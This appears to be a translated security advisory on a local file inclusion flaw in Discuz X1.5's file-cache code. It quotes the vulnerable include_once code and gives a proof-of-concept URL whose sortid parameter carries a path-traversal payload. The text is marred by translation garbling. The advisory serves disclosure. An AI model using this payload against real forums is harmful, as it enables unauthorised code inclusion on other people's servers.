DISCUZX1. 5 local file inclusion vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201129530
Type myhack58
Reporter 佚名
Modified 2011-02-23T00:00:00


DISCUZX1. 5 local file inclusion, of course, is conditional, is to use a file as a cache. config_global.php $_config['cache']['type'] = 'file';

function cachedata($cachenames) { ...... $isfilecache = getglobal('config/cache/type') == 'file'; ...... if($isfilecache) { $lostcaches = array(); foreach($cachenames as $cachename) { if(!@ the include_once(DISCUZ_ROOT.'./ data/cache/cache_'.$ cachename.'. php')) { $lostcaches[] = $cachename; } }

...... }

Address: http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc Authracation has expiried The implementation of the api/uc.php the page code.

Author: Jannock